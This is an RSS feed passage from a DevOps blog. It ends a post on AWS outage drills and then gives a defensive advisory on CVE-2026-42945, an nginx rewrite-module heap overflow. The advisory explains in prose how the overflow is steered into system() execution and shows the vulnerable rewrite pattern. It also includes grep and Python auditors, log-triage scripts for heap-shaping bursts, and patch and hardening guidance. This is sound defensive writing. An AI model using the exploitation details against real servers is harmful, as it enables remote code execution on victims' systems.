        <a href="#h2-the-single-az-for-latency-exception" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          The single-AZ-for-latency exception
        </a>
        </h2><p>The honest version of this post acknowledges that single-AZ deployments are sometimes correct. Latency-sensitive trading systems, real-time bidding pipelines, and tight feedback-loop control planes all have cases where the extra 2-4 ms of cross-AZ round-trip is unaffordable.</p>
<p>If that is you, the test is not &quot;are we multi-AZ&quot;, the test is &quot;can we cut over to a hot standby in another AZ in under five minutes with one button&quot;. Concrete requirements:</p>
<ol>
<li>The standby exists and is <strong>continuously receiving traffic</strong>. Not &quot;warm&quot;. Not &quot;pre-provisioned&quot;. Actively serving a small percentage of read traffic at minimum, so its connection pools and caches are not cold.</li>
<li><strong>A documented promotion procedure</strong> that a single on-call engineer can execute from their laptop without consulting anyone. Less than 20 commands. Idempotent. Tested in the quarterly drill.</li>
<li><strong>Monitoring on the promotion path itself</strong>. The most common DR failure is &quot;we promoted, but the new primary&#39;s connection-pool size limit was 1000, and we have 5000 active clients trying to reconnect at once&quot;. Watch for it.</li>
<li><strong>An honest RTO number</strong>. Coinbase&#39;s outage was over five hours. Their RTO target before this incident is not public, but the only way &quot;more than 5 hours&quot; is the correct RTO for an exchange is if a regulator agreed to it in writing. For everyone else, the post-incident RTO target is the new floor.</li>
</ol>
<p>The Coinbase situation looks like the standby existed but had not been promoted under realistic conditions in some time. That is the single most common failure mode I have seen in production DR audits. The standby is real. It has just never been used in anger. The drill is what closes that gap.</p>
<h2 id="h2-what-to-do-this-week" class="group relative scroll-mt-24">
        <a href="#h2-what-to-do-this-week" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          What to do this week
        </a>
        </h2><p>Five things, in order:</p>
<ol>
<li><strong>Run the inventory.</strong> <code>aws ec2 describe-instances --filters &quot;Name=availability-zone-id,Values=use1-az4&quot;</code> and equivalents for your critical regions. Anything in a single AZ that is in the customer-facing path needs a multi-AZ peer or a documented exception.</li>
<li><strong>Audit the dependency graph.</strong> The shared single-AZ resource is usually not in the obvious places (the database, the load balancer). It is in the homegrown bits (a service-discovery layer, a metric aggregator, an internal API gateway, a self-hosted Redis). Run the trace and flag every single-AZ node.</li>
<li><strong>Schedule the first FIS drill.</strong> Staging only, 30 minutes, working hours, on-call watching, stop-condition tied to a real alarm. Aim for next Tuesday.</li>
<li><strong>Write the promotion runbook.</strong> Numbered steps. Less than 20 commands. Idempotent. Reviewed by someone who was not on the team that wrote it.</li>
<li><strong>Set the cadence.</strong> Quarterly minimum. The drill that does not happen on a schedule is the drill that is not happening.</li>
</ol>
<p>The thermal event will repeat. AWS will have another one, in some other AZ, in some other quarter. So will GCP. So will Azure. The teams that recover in 30 minutes instead of 5 hours are not the teams with the better cloud architecture. They are the teams that have rehearsed.</p>
<h2 id="h2-sources" class="group relative scroll-mt-24">
        <a href="#h2-sources" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          Sources
        </a>
        </h2><ul>
<li>AWS service health page coverage of the May 7-8 incident: <a href="https://health.aws.amazon.com/">health.aws.amazon.com</a> and the AWS <a href="https://aws.amazon.com/premiumsupport/technology/pes/">Post-Event Summaries index</a></li>
<li>The Register coverage of the thermal event: <a href="https://www.theregister.com/off-prem/2026/05/08/aws-warns-of-ec2-impairment-as-power-loss-hits-notorious-us-east-1-region/5235509">theregister.com/off-prem/2026/05/08/aws-warns-of-ec2-impairment-as-power-loss-hits-notorious-us-east-1-region</a></li>
<li>Coinbase outage timeline and Rob Witoff statement: <a href="https://www.coindesk.com/business/2026/05/08/coinbase-disruption-tied-to-aws-outage-draws-criticism-amid-staff-layoffs-and-q1-losses">coindesk.com</a> and <a href="https://www.benzinga.com/crypto/26/05/52433912/coinbase-says-aws-cooling-failure-crashed-exchange-during-turbulent-week-ceo-brian-armstrong-calls-it-never-acceptable">benzinga.com</a></li>
<li>Service-impact roundup: <a href="https://statusgator.com/blog/may-7-2026-aws-outage-impact/">StatusGator</a></li>
<li>AWS FIS docs: <a href="https://aws.amazon.com/fis/">aws.amazon.com/fis</a></li>
<li>RDS Multi-AZ failover behaviour: <a href="https://docs.aws.amazon.com/AmazonRDS/latest/UserGuide/Concepts.MultiAZ.Failover.html">docs.aws.amazon.com/AmazonRDS/latest/UserGuide/Concepts.MultiAZ.Failover.html</a></li>
<li>Advanced Multi-AZ Resilience Patterns whitepaper: <a href="https://docs.aws.amazon.com/whitepapers/latest/advanced-multi-az-resilience-patterns/advanced-multi-az-resilience-patterns.html">docs.aws.amazon.com/whitepapers/latest/advanced-multi-az-resilience-patterns</a></li>
</ul>
<p>Drill the failover. The thermal event will return. The DR runbook that has never been used is not a runbook, it is a wish.</p>
]]></content:encoded>
    </item>
    <item>
      <title><![CDATA[NGINX Rift (CVE-2026-42945): The 18-Year-Old Rewrite Bug That Hands an Attacker Your Worker Process]]></title>
      <link>https://devops-daily.com/posts/nginx-rift-cve-2026-42945-rewrite-rce</link>
      <description><![CDATA[An autonomous code-audit tool found an 18-year-old heap overflow in NGINX's rewrite module. Affects every release from 0.6.27 through 1.30.0, plus NGINX Plus and the entire F5 product line. Full RCE PoC is public. Here is the one-line config grep that tells you whether you are exposed, the patch matrix, and what to do about the long tail of products that bundle the vulnerable nginx without a vendor patch yet.]]></description>
      <pubDate>Thu, 14 May 2026 12:30:00 GMT</pubDate>
      <guid isPermaLink="true">https://devops-daily.com/posts/nginx-rift-cve-2026-42945-rewrite-rce</guid>
      <category><![CDATA[Networking]]></category>
      <author><![CDATA[DevOps Daily Team]]></author>
      <category><![CDATA[Networking]]></category><category><![CDATA[Security]]></category><category><![CDATA[NGINX]]></category><category><![CDATA[CVE]]></category><category><![CDATA[DevOps]]></category>
      <content:encoded><![CDATA[<p>On May 13, 2026, F5 published <a href="https://my.f5.com/manage/s/article/K000161019">K000161019</a> and the <a href="https://nginx.org/en/security_advisories.html">security advisories list</a> at nginx.org picked up a new entry. The bug, branded &quot;NGINX Rift&quot; by its discoverer and tracked as <a href="https://nvd.nist.gov/vuln/detail/CVE-2026-42945">CVE-2026-42945</a>, is a heap buffer overflow in the rewrite module that has been sitting in <code>ngx_http_script.c</code> since the 0.6.27 release in 2008. Every nginx release between then and 1.30.0 is vulnerable. So is NGINX Plus through R36. So is every F5 product that ships nginx internally, including their commercial Ingress Controller, App Protect WAF, and Instance Manager.</p>
<p>A working remote code execution PoC is public on GitHub. There is no in-the-wild exploitation reported as of this morning, but the <a href="https://github.com/depthfirstdisclosures/nginx-rift">PoC repository</a> is small enough to read in one sitting and the exploit primitive is deterministic. The clock is short.</p>
<p>This post covers what the bug actually is, the one-line grep that tells you whether your config is exploitable (because the F5 advisory&#39;s &quot;vulnerable&quot; framing is broader than your actual exposure), the patch matrix across distros, and the long tail of OpenResty, Kong, APISIX, and other downstream products that have no advisory yet but ship the same vulnerable code.</p>
<h2 id="h2-tldr" class="group relative scroll-mt-24">
        <a href="#h2-tldr" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          TL;DR
        </a>
        </h2><ul>
<li><strong>CVE-2026-42945</strong>, CVSS v4 9.2 / v3 8.1. Heap buffer overflow in <code>ngx_http_rewrite_module</code> reachable by an unauthenticated HTTP request against any nginx running a vulnerable rewrite pattern.</li>
<li><strong>Affected</strong>: NGINX Open Source 0.6.27 through 1.30.0; NGINX Plus R32 through R36; F5 NGINX Ingress Controller 3.5.0-5.4.1, NGINX App Protect WAF 4.x and 5.x, NGINX Gateway Fabric, NGINX Instance Manager. OpenResty, Tengine, Angie, FreeNGINX, Kong, APISIX and the Kubernetes <code>ingress-nginx</code> project all ship the same <code>ngx_http_script.c</code> and should be treated as vulnerable until their maintainers ship a patched release.</li>
<li><strong>Fixed in</strong>: nginx 1.31.0 (mainline) and 1.30.1 (stable). NGINX Plus R36 P4, R35 P2, R32 P6.</li>
<li><strong>The trigger</strong> is operator-written config, not attacker-controlled config. A <code>rewrite</code> directive whose replacement contains <code>?</code> and uses an unnamed capture (<code>$1</code>, <code>$2</code>, etc.) referenced again by <code>set</code>, <code>if</code>, or a subsequent <code>rewrite</code> is enough. The attacker just sends one HTTP request with the right URL.</li>
<li><strong>Successful exploitation</strong> lands code execution as the nginx worker user (often <code>www-data</code> or <code>nginx</code>). Workers hold the TLS private key in memory and serve responses, so even non-root worker access is a serious incident.</li>
<li><strong>Detection</strong>: there are no published WAF rules from Cloudflare, AWS, or OWASP CRS yet. Grep your own configs. The one-liner is below.</li>
</ul>
<h2 id="h2-prerequisites" class="group relative scroll-mt-24">
        <a href="#h2-prerequisites" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          Prerequisites
        </a>
        </h2><ul>
<li>Shell access to any host that runs nginx, or to a Kubernetes cluster running an nginx-based ingress controller.</li>
<li>The nginx config tree (<code>/etc/nginx/</code>, or your container image&#39;s equivalent).</li>
<li>Patience for one round of <code>grep</code> followed by either a package upgrade or a config audit.</li>
</ul>
<h2 id="h2-what-the-bug-actually-is" class="group relative scroll-mt-24">
        <a href="#h2-what-the-bug-actually-is" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          What the bug actually is
        </a>
        </h2><p>The rewrite module compiles every <code>rewrite</code>, <code>set</code>, <code>if</code>, and <code>return</code> directive into a small bytecode that runs once per request. The compiler produces two code arrays: a &quot;length&quot; array that calculates how many bytes the rewritten string will occupy, and a &quot;value&quot; array that actually writes those bytes.</p>
<p>Two state bits flow through this machine. One is <code>is_args</code>, which records whether the rewrite has crossed into the query-string portion of the URL. The other is the destination buffer pointer. The bug is that those two bits get out of sync when the rewrite uses an unnamed PCRE capture and the replacement contains <code>?</code>.</p>
<p>Concretely, after a <code>rewrite ^/api/(.+) /v2/$1?internal=1 break;</code> runs once, the engine permanently flips <code>is_args=1</code> on the main script engine. The length pass for the next <code>rewrite</code> (or <code>set</code>, or <code>if</code> referencing <code>$1</code>) runs through a zeroed sub-engine where <code>is_args=0</code>, so the capture-length code returns the raw byte count of <code>$1</code>. The copy pass sees <code>is_args=1</code> on the main engine and routes the same bytes through <code>ngx_escape_uri</code>, which expands characters like <code>+</code>, <code>%</code>, <code>&amp;</code>, and space into their percent-encoded forms. The destination buffer was sized for the raw count, so the expanded bytes write past the end of the allocation.</p>
<p>The corruption lands in the request pool. With cross-request heap shaping, the PoC walks the overflow into the <code>ngx_pool_cleanup_t</code> handler pointer and gets <code>system()</code> called with attacker-controlled arguments. Worker code execution follows. All the technical detail is in the <a href="https://depthfirst.com/research/nginx-rift-achieving-nginx-rce-via-an-18-year-old-vulnerability">depthfirst writeup</a> and the <a href="https://github.com/nginx/nginx/commit/2046b45aa0c6e712c216b9075886f3f26e9b4ca9">fix commit</a>.</p>
<p>Two important details for operators:</p>
<ol>
<li><strong>This is not a config-poisoning bug.</strong> Some vulnerability writeups make a bug sound less serious by noting it requires attacker-controlled nginx.conf. This one does not. Vulnerable configs are operator-written, common in API-gateway and reverse-proxy deployments, and the attacker only needs to send an HTTP request.</li>
<li><strong><code>nginx -t</code> does not flag the pattern.</strong> The vulnerable config is syntactically valid. There is no warning from the standard config check. You have to grep.</li>
</ol>
<h2 id="h2-find-vulnerable-configs-in-your-tree" class="group relative scroll-mt-24">
        <a href="#h2-find-vulnerable-configs-in-your-tree" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          Find vulnerable configs in your tree
        </a>
        </h2><p>The dangerous pattern needs three things together: a <code>rewrite</code> whose replacement contains <code>?</code>, the replacement contains an unnamed capture (<code>$1</code> through <code>$9</code>), and the same capture is read by a later <code>rewrite</code>, <code>set</code>, or <code>if</code> in the same <code>server</code> or <code>location</code> block.</p>
<p>The fast heuristic is a regex against your full config tree:</p>
<pre><code class="hljs language-bash"><span class="hljs-comment"># List rewrite directives whose replacement carries both &#x27;?&#x27; and a $N capture.</span>
grep -RHnE <span class="hljs-string">&#x27;rewrite[[:space:]]+[^;]+\$[1-9][^;]*\?|rewrite[[:space:]]+[^;]+\?[^;]*\$[1-9]&#x27;</span> /etc/nginx/ 2&gt;/dev/null
</code></pre><p>That gives you the candidate <code>rewrite</code> lines. From there, walk the <code>server</code> and <code>location</code> blocks each lives in and confirm whether any <code>set $foo $1</code>, <code>if ($1 = &quot;...&quot;)</code>, or a second <code>rewrite</code> references the same capture. Those are the exploitable combinations.</p>
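<p>The block walk described above can be scripted. The Python below is an added example, not code from nginx, F5 or the advisory: it pairs each candidate <code>rewrite</code> with later <code>rewrite</code>, <code>set</code> or <code>if</code> directives in the same <code>server</code> or <code>location</code> block that read the same capture. It is a heuristic that does not model rewrite flags, <code>include</code> expansion or execution order, so confirm every hit by hand; the sample config and the names <code>directives</code>, <code>audit</code> and <code>Finding</code> are constructed for illustration.</p>

```python
import re
from collections import namedtuple

CAPTURE = re.compile(r"\$([1-9])")    # unnamed PCRE captures $1..$9
READERS = {"rewrite", "set", "if"}    # directives that can read a capture
SCOPES = {"server", "location"}       # blocks that bound the search
Finding = namedtuple("Finding", "rewrite_line capture reader reader_line")


def directives(text):
    """Yield (line, path, words); path = enclosing (block_id, name) pairs."""
    text += "\n"                                    # every comment now ends in \n
    stack, words, cur, quote, start, next_id = [], [], "", None, 0, 0
    i = 0
    while i < len(text):
        ch = text[i]
        if quote:                                   # inside a quoted word
            if ch == "\\":                          # keep escape pairs verbatim
                cur, i = cur + text[i:i + 2], i + 2
                continue
            if ch == quote:
                quote = None
            else:
                cur += ch
        elif ch in "\"'" and not cur:               # quotes only open a word
            quote = ch
            start = start if words else i
        elif ch == "#" and not cur:                 # comment: skip to end of line
            i = text.find("\n", i)
            continue
        elif ch == "{" and cur.endswith("$"):       # ${name} is a variable, not a block
            end = max(text.find("}", i), i)
            cur, i = cur + text[i:end + 1], end + 1
            continue
        elif ch.isspace() or ch in ";{}":
            if cur:
                words.append(cur)
                cur = ""
            if ch in ";{" and words:
                yield text.count("\n", 0, start) + 1, tuple(stack), words
                if ch == "{":
                    next_id += 1
                    stack.append((next_id, words[0]))
                words = []
            elif ch == "}" and stack:
                stack.pop()
        else:
            start = start if cur or words else i
            cur += ch
        i += 1


def captures_read(words):
    """$N references a directive reads; a rewrite's own regex is skipped."""
    args = words[2:] if words[0] == "rewrite" else words[1:]
    return set(CAPTURE.findall(" ".join(args)))


def audit(text):
    """Pair each candidate rewrite with later in-scope readers of its $N."""
    items, findings = list(directives(text)), []
    for idx, (line, path, words) in enumerate(items):
        wanted = set(CAPTURE.findall(words[2])) if len(words) > 2 else set()
        if words[0] != "rewrite" or not wanted or "?" not in words[2]:
            continue                      # needs both '?' and $N in the replacement
        # Nearest enclosing server/location; None means a bare include file.
        scope = next((b for b in reversed(path) if b[1] in SCOPES), None)
        for later_line, later_path, later in items[idx + 1:]:
            if later[0] not in READERS or (scope and scope not in later_path):
                continue
            for cap in sorted(captures_read(later) & wanted):
                findings.append(Finding(line, "$" + cap, later[0], later_line))
    return findings


# Constructed sample config for illustration, not taken from a real deployment.
SAMPLE = r"""
server {
    location /api/ {
        rewrite ^/api/(.+) /v2/$1?internal=1;
        set $orig $1;
    }
    location /lonely/ {
        rewrite ^/lonely/(.+) /v2/$1?x=1;      # candidate, but nothing reads $1 later
    }
}
server {
    rewrite ^/old/(.*)$ /new/?path=$1;         # '?' before the capture
    location / {
        if ($1 = "admin") { return 403; }
    }
}
"""


if __name__ == "__main__":
    print(*audit(SAMPLE), sep="\n")
```

<p>Run <code>audit()</code> on the output of <code>nginx -T</code> to cover included files in one pass; the <code>/lonely/</code> block shows a grep hit that does not meet the third condition.</p>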
<p>If you run nginx inside Kubernetes via <code>ingress-nginx</code>, the same grep against the generated config inside the controller pod is the answer:</p>
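<pre><code class="hljs language-bash"><span class="hljs-comment"># Same pattern as above ($N before or after the ?), run against the generated config in the controller pod.</span>
kubectl -n ingress-nginx <span class="hljs-built_in">exec</span> deploy/ingress-nginx-controller -- \
  sh -c <span class="hljs-string">&quot;cat /etc/nginx/nginx.conf | grep -nE &#x27;rewrite[[:space:]]+[^;]+\\\$[1-9][^;]*\\?|rewrite[[:space:]]+[^;]+\\?[^;]*\\\$[1-9]&#x27;&quot;</span>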
</code></pre><p>The generated config aggregates every Ingress&#39;s annotations into one file. Snippets, <code>rewrite-target</code>, and <code>configuration-snippet</code> are the common sources.</p>
<p>If the grep is empty across your entire fleet, you are not currently exploitable. Upgrade anyway, because the next config change a developer pushes may add a vulnerable pattern, and you would rather not be running a binary whose CVE you already shrugged off.</p>
<h2 id="h2-the-patch-matrix" class="group relative scroll-mt-24">
        <a href="#h2-the-patch-matrix" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          The patch matrix
        </a>
        </h2><pre><code class="hljs language-text">+--------------------------------+-------------------------------------+
| Software                       | Patched version                     |
+--------------------------------+-------------------------------------+
| nginx (mainline)               | 1.31.0                              |
| nginx (stable)                 | 1.30.1                              |
| NGINX Plus R36                 | R36 P4                              |
| NGINX Plus R35                 | R35 P2                              |
| NGINX Plus R32                 | R32 P6                              |
| F5 NGINX Ingress Controller    | 5.4.2 (when released)               |
| F5 NGINX App Protect WAF       | 4.16.1 / 5.8.1 (when released)      |
| F5 NGINX Gateway Fabric        | 2.5.2 (when released)               |
| F5 NGINX Instance Manager      | 2.21.2 (when released)              |
| OpenResty                      | No advisory yet                     |
| Tengine, Angie, FreeNGINX      | No advisory yet                     |
| Kong, APISIX                   | No advisory yet                     |
| Kubernetes ingress-nginx       | Retired, no patch coming            |
+--------------------------------+-------------------------------------+
</code></pre><p>Distro status as of this morning (2026-05-14):</p>
<ul>
<li><strong>Debian</strong> (<a href="https://security-tracker.debian.org/tracker/CVE-2026-42945">tracker</a>): bullseye, bookworm, trixie, forky all show vulnerable. Only <code>sid</code> has the fixed <code>1.30.0-3</code> package landed.</li>
<li><strong>AlmaLinux</strong>: backport for 8, 9, and 10 <a href="https://almalinux.org/blog/2026-05-13-nginx-rift-cve-2026-42945/">published</a> in the <code>testing</code> repos using the upstream patch. Worth pulling if you cannot wait for RHEL.</li>
<li><strong>RHEL, Ubuntu, Alpine</strong>: no published advisories yet.</li>
</ul>
<p>The Kubernetes <code>ingress-nginx</code> line is the one to flag for your platform team. That project went EOL in <a href="https://kubernetes.io/blog/2025/11/11/ingress-nginx-retirement/">March 2026</a> and there is no maintainer left to ship a patched container image. If you are still on it, this is the second CVE in nine days where the answer is &quot;there is no patch coming, plan the Gateway API migration.&quot; We covered that migration <a href="/posts/ingress-nginx-eol-gateway-api-migration">in a separate post</a>.</p>
<h2 id="h2-if-you-cannot-patch-in-the-next-24-hours" class="group relative scroll-mt-24">
        <a href="#h2-if-you-cannot-patch-in-the-next-24-hours" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          If you cannot patch in the next 24 hours
        </a>
        </h2><p>There is no published WAF rule from Cloudflare&#39;s managed set, AWS WAF managed rules, or the OWASP Core Rule Set as of this morning. A custom rule that drops URLs containing combinations of percent-encoded bytes and unencoded special characters can blunt the most obvious PoC, but the underlying primitive is broad and the attacker can vary their input shape considerably.</p>
<p>The realistic short-term mitigations:</p>
<ol>
<li><strong>Audit and edit the vulnerable rewrite blocks.</strong> If a <code>rewrite</code> line carries the dangerous pattern and you can rewrite it without the <code>?</code> or the unnamed capture, do that. Most API-gateway rewrites can move the query-string concatenation into a <code>set $args ...</code> statement instead of stuffing it into the <code>rewrite</code> replacement.</li>
<li><strong>Front nginx with a non-nginx proxy that can drop malformed paths.</strong> A separately-deployed Envoy or HAProxy in front of nginx does not magically rescue you, because both proxies forward the URL path unchanged by default. But you can add path-normalisation or path-length limits at the front proxy that make exploitation harder. This buys time, not safety.</li>
<li><strong>Run workers under a tightly scoped systemd unit.</strong> <code>NoNewPrivileges=yes</code>, <code>ProtectSystem=strict</code>, <code>ProtectHome=yes</code>, <code>PrivateTmp=yes</code>, <code>RestrictAddressFamilies=AF_UNIX AF_INET AF_INET6</code>, <code>SystemCallFilter=@system-service</code>, and especially <code>MemoryDenyWriteExecute=yes</code>. None of these stop the corruption, but <code>MemoryDenyWriteExecute=yes</code> plus the <code>RestrictAddressFamilies</code> line break the PoC&#39;s preferred follow-up of dropping a shell. You still want to upgrade.</li>
</ol>
<p>Removing the <code>rewrite</code> module entirely at build time is possible (<code>./configure --without-http_rewrite_module</code>) but breaks more than it fixes for most deployments.</p>
<h2 id="h2-what-to-watch-in-your-logs" class="group relative scroll-mt-24">
        <a href="#h2-what-to-watch-in-your-logs" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          What to watch in your logs
        </a>
        </h2><p>There is no canonical detection signature yet. The PoC needs to send a stream of requests to shape the heap before the trigger request arrives, so a spike in same-prefix requests from one source to URLs that hit your rewrite blocks is the kind of pattern that should raise eyebrows. Two queries worth running over the last week&#39;s access logs:</p>
<pre><code class="hljs language-bash"><span class="hljs-comment"># Request count per (source IP, request path) pair across the whole log, highest first; assumes the combined log format</span>
awk <span class="hljs-string">&#x27;{print $1, $7}&#x27;</span> /var/log/nginx/access.log \
  | <span class="hljs-built_in">sort</span> | <span class="hljs-built_in">uniq</span> -c | <span class="hljs-built_in">sort</span> -rn | <span class="hljs-built_in">head</span> -50
</code></pre><pre><code class="hljs language-bash"><span class="hljs-comment"># Log lines carrying four or more percent-encoded bytes (matched anywhere on the line, not only in the path)</span>
grep -E <span class="hljs-string">&#x27;%[0-9A-Fa-f]{2}.*%[0-9A-Fa-f]{2}.*%[0-9A-Fa-f]{2}.*%[0-9A-Fa-f]{2}&#x27;</span> \
  /var/log/nginx/access.log | <span class="hljs-built_in">head</span> -50
</code></pre><p>Neither is specific enough to alert on, but both are good enough for retrospective investigation if you suspect compromise. Combine with worker process crash reports in your system journal (<code>journalctl -u nginx</code>).</p>
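<p>The spike described above (many requests from one source to the same rewrite-handled prefix in a short window) needs a time window and a prefix grouping. The Python below is an added example for retrospective triage, not a published detection for this CVE; the log lines are constructed, and the 60-second window, the threshold of 5, the cut-off of 4 encoded bytes and the watched prefix <code>/api</code> are assumptions to tune against your own rewrite blocks.</p>

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Combined log format: ip - user [time] "METHOD uri PROTO" status ...
LINE = re.compile(r'(\S+) \S+ \S+ \[([^\]]+)\] "\S+ (\S+)[^"]*" \d{3}')
PCT = re.compile(r"%[0-9A-Fa-f]{2}")


def parse(line):
    """Return (ip, timestamp, first path segment, percent-encoded byte count)."""
    m = LINE.match(line)
    if not m:
        return None                       # skip lines in another format
    ip, ts, uri = m.groups()
    when = datetime.strptime(ts, "%d/%b/%Y:%H:%M:%S %z")
    prefix = "/" + uri.split("?", 1)[0].lstrip("/").split("/", 1)[0]
    return ip, when, prefix, len(PCT.findall(uri))


def bursts(lines, watched, window=timedelta(seconds=60), threshold=5, heavy=4):
    """Per (source, prefix) on a watched prefix: peak request count inside any
    sliding `window`, plus how many requests carried >= `heavy` encoded bytes."""
    seen = defaultdict(list)
    for line in lines:
        rec = parse(line)
        if rec and rec[2] in watched:
            seen[rec[0], rec[2]].append((rec[1], rec[3]))
    report = {}
    for key, hits in seen.items():
        hits.sort()
        peak = lo = 0
        for hi, (when, _) in enumerate(hits):
            while when - hits[lo][0] > window:     # slide the window start forward
                lo += 1
            peak = max(peak, hi - lo + 1)
        if peak >= threshold:
            report[key] = {"peak": peak,
                           "encoded_heavy": sum(pct >= heavy for _, pct in hits)}
    return report


def _line(ip, hh_mm_ss, uri):
    """Build one constructed combined-format log line."""
    return (f'{ip} - - [14/May/2026:{hh_mm_ss} +0000] '
            f'"GET {uri} HTTP/1.1" 200 512 "-" "-"')


# Constructed access-log lines (documentation address ranges), not real traffic.
QUERY = "?q=a%20b%2Bc%25d%26e"
SAMPLE = (
    # One source, 8 requests to /api/ within 35 seconds, every other one encoded.
    [_line("203.0.113.7", f"10:00:{5 * i:02d}", f"/api/v1/items/{i}" + QUERY * (i % 2))
     for i in range(8)]
    # Another source on the same prefix, one request every five minutes.
    + [_line("198.51.100.20", f"10:{5 * i:02d}:03", "/api/users") for i in range(6)]
    # A burst on a prefix that no rewrite block handles.
    + [_line("192.0.2.9", f"10:00:{i:02d}", "/static/app.js") for i in range(6)]
)


if __name__ == "__main__":
    for (ip, prefix), stats in bursts(SAMPLE, watched={"/api"}).items():
        print(ip, prefix, stats)
```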
<h2 id="h2-the-ai-found-angle" class="group relative scroll-mt-24">
        <a href="#h2-the-ai-found-angle" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          The AI-found angle
        </a>
        </h2><p>The bug was found by an autonomous code-audit system run by <a href="https://depthfirst.com">depthfirst</a>, in a six-hour run on the nginx codebase in April 2026. The same run surfaced four other memory-corruption issues, all of which F5 confirmed. The disclosure timeline was tight (April 18 found, April 21 reported, April 28 working RCE PoC, May 13 advisory), which is roughly the speed an AI-assisted research workflow lets a small team operate at.</p>
<p>The framing matters less than the implication. The codebase that nobody has shipped a critical RCE against in 18 years now has one shipped against it inside a single afternoon of automated review. The cadence of these &quot;old codebase, new CVE&quot; disclosures is going to keep getting faster, and the operational discipline that lets you patch in 24 hours instead of three weeks is going to keep getting more valuable.</p>
<h2 id="h2-sources" class="group relative scroll-mt-24">
        <a href="#h2-sources" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          Sources
        </a>
        </h2><ul>
<li>F5 advisory K000161019: <a href="https://my.f5.com/manage/s/article/K000161019">my.f5.com/manage/s/article/K000161019</a></li>
<li>nginx security advisories index: <a href="https://nginx.org/en/security_advisories.html">nginx.org/en/security_advisories.html</a></li>
<li>Fix commit: <a href="https://github.com/nginx/nginx/commit/2046b45aa0c6e712c216b9075886f3f26e9b4ca9">github.com/nginx/nginx/commit/2046b45aa0c6e712c216b9075886f3f26e9b4ca9</a></li>
<li>depthfirst writeup: <a href="https://depthfirst.com/research/nginx-rift-achieving-nginx-rce-via-an-18-year-old-vulnerability">depthfirst.com/research/nginx-rift</a></li>
<li>PoC repository: <a href="https://github.com/depthfirstdisclosures/nginx-rift">github.com/depthfirstdisclosures/nginx-rift</a></li>
<li>NVD entry: <a href="https://nvd.nist.gov/vuln/detail/CVE-2026-42945">nvd.nist.gov/vuln/detail/CVE-2026-42945</a></li>
<li>Debian tracker: <a href="https://security-tracker.debian.org/tracker/CVE-2026-42945">security-tracker.debian.org/tracker/CVE-2026-42945</a></li>
<li>AlmaLinux backport: <a href="https://almalinux.org/blog/2026-05-13-nginx-rift-cve-2026-42945/">almalinux.org/blog/2026-05-13-nginx-rift-cve-2026-42945</a></li>
<li>Original disclosure tweet: <a href="https://x.com/IntCyberDigest/status/2054844733571092943">@IntCyberDigest on X</a></li>
</ul>
<p>Grep first. Patch second. Plan the ingress-nginx migration if you have not already.</p>
]]></content:encoded>
    </item>
  </channel>
</rss>